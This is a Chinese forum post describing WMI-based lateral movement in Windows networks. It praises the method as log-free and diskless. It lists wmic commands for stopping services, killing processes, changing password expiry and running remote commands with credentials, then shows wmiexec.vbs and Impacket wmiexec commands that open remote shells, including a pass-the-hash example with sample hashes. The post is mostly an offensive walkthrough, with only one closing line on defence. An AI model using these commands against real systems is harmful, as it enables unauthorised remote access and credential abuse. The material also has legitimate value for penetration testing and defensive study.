WMI(Windows Management Instrumentation)是Windows操作系统上WBEM(Web-Based Enterprise Management)和CIM(Common Information Model)标准的实现。它允许用户、管理员和开发人员在操作系统中遍历、操作和交互各种托管组件,但同时也为攻击者提供了可能性。WMI提供了一个抽象的、统一的面向对象模型,使得用户无需直接与不相关的API进行交互。
一个重要的特性是WMI可以使用DCOM或WinRM协议与远程机器的WMI模块进行交互,使得攻击者可以远程操作主机上的WMI类,而无需事先运行任何代码。
WMI简要介绍
Windows Management Instrumentation (WMI) 出现在所有Windows操作系统中,是由一组强大的工具集合组成,用于管理本地或远程的Windows系统。攻击者利用WMI进行攻击时,系统默认不会在日志中记录这些操作,实现了无日志的攻击,攻击脚本也无需写入磁盘,从而增加了隐蔽性。推荐使用wmic进行远程执行命令。
常用wmic命令
以下是一些常用的wmic命令,用于管理和查询Windows系统的信息:
wmic useraccount WHERE “Name=’%username%'” set PasswordExpires=false //设置用户永不超期
wmic startup list brief //查询自启信息
wmic volume list brief //查询磁盘分区信息
wmic useraccount list full //查询用户信息
wmic service list full //查询服务信息
wmic SERVICE where name=”dhcp” call stopservice //关闭服务
wmic DESKTOPMONITOR get ScreenHeight,ScreenWidth //查询屏幕分辨率
wmic process where processid=”3652″ delete //关闭进程
wmic process 2345 call terminate //关闭进程
wmic process where name=”qq.exe” call terminate //关闭进程
wmic qfe get Caption,Description,HotFixID,InstalledOn //查询补丁安装时间
wmic process where name=”ConsoleApplication.exe” get ExecutablePath //查看进程位置
wmic.exe /node:ip /user:localhost\administrator /password:”password” PROCESS call create “cmd /c whoami”
type \192.168.52.129\c$\Windows\res.dll //远程命令执行
wmic qfe get hotfixid //查看补丁情况
WMI利用条件
为了成功利用WMI,需要满足以下条件:
- 远程服务器启动Windows Management Instrumentation服务(默认开启)
- 135端口未被过滤,否则将无法连接(默认配置下目标主机防火墙开启将无法连接)
连接失败的常见错误号可以通过参考图片中的信息来诊断。
WMIEXEC工具
WMIEXEC是一种工具,可用于通过WMI执行命令,从而获取远程主机的Shell。以下是使用WMIEXEC的示例:
wmiexec.vbs
cscript wmiexec.vbs /shell 192.168.52.129 administrator Password!!
![图片[1]-探索WMI横向移动姿势:技巧与策略-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240301131850702-image.png)
这将提供一个半交互式的Shell。
Impacket套件
Impacket套件是通过445端口进行通信的工具,而不是通过135端口。在Windows环境下,可以使用Impacket来与远程主机通信。以下是使用Impacket的示例:
wmiexec.exe administrator:Password!!@192.168.52.129
![图片[2]-探索WMI横向移动姿势:技巧与策略-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240301131903624-image.png)
此命令将获取目标主机的Shell。如果抓到的密码的NTLM无法解开,可以使用Impacket中的wmiexec通过哈希传递来获取Shell。
命令格式为:
wmiexec.exe -hashes LM哈希:NTLM哈希 域名/用户名@目标IP
wmiexec.exe -hashes e52cac67419a9a22a67a448822b50c99:2b07f7b579bb97532a9eb37753765d8f tubai/administrator@192.168.52.129
![图片[3]-探索WMI横向移动姿势:技巧与策略-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240301131919929-image.png)
![图片[4]-探索WMI横向移动姿势:技巧与策略-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240301131929938-image.png)
参考和总结
- 参考文章链接:https://blog.csdn.net/qq_27446553/article/details/46008473
总体而言,WMI是一种潜在的内网横向移动方式,但同时也需要注意安全配置以防止滥用。
![表情[qiudale]-山海云端论坛](https://www.shserve.cn/wp-content/themes/Shanhai/img/smilies/qiudale.gif)
我也是买了领不了、
暂无评论内容